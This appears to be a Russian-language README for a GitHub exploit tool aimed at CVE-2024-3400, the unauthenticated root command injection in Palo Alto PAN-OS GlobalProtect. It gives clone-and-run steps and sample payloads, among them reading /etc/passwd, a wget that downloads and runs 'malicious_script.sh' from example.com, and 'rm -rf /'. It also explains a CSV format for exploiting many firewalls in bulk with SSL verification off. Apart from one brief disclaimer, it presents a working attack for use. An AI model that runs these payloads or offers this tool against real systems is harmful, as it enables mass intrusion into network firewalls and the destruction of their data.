
Эксплойт-скрипт для CVE-2024-3400, инъекции команд в PAN-OS GlobalProtect, позволяющей неаутентифицированное удалённое выполнение кода с правами root. Поддерживает эксплуатацию одиночных целей и множественных целей на основе CSV.
Этот скрипт предназначен для демонстрации эксплуатации уязвимостей в межсетевых экранах PAN-OS. Он отправляет специально созданную нагрузку на конечную точку API межсетевого экрана для выполнения произвольных команд. Этот эксплойт нацелен на CVE-2024-3400, уязвимость внедрения команд в функции GlobalProtect программного обеспечения Palo Alto Networks PAN-OS для определенных версий PAN-OS. Отдельные конфигурации функций могут позволить неаутентифицированному злоумышленнику выполнять произвольный код с правами root на межсетевом экране.
Примечание: Пожалуйста, убедитесь, что вы используете этот скрипт только в законных и этических целях и только на машинах, на которых вам разрешено проводить тестирование.
Чтобы использовать этот проект, выполните следующие шаги:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
Следуйте подсказкам, чтобы ввести IP-адрес уязвимого межсетевого экрана PAN-OS и нагрузку для выполнения.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
Скрипт запросит путь к файлу SSL-сертификата сервера межсетевого экрана PAN-OS. Если путь не указан, скрипт автоматически установит проверку SSL в false, фактически отключив SSL.
Этот скрипт позволяет эксплуатировать несколько целей уязвимых межсетевых экранов PAN-OS с помощью CSV-файла. Ниже приведены инструкции по правильному форматированию CSV-файла:
CSV-файл должен содержать три столбца:
ipaddress: IP-адрес уязвимого межсетевого экрана PAN-OS.
payload: Нагрузка для выполнения на межсетевом экране.
path/to/root_CA_certificate.pem: Путь к корневому сертификату ЦС (оставьте пустым, если проверка сертификата отключена).
Пример CSV-файла:
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
Создайте CSV-файл в указанном формате. Заполните IP-адреса, нагрузки и пути к корневым сертификатам ЦС (если применимо). Убедитесь, что вы указали допустимые пути к корневым сертификатам ЦС, или оставьте поле пустым, если проверка сертификата отключена. Запустите скрипт и при появлении запроса выберите опцию использования CSV-файла.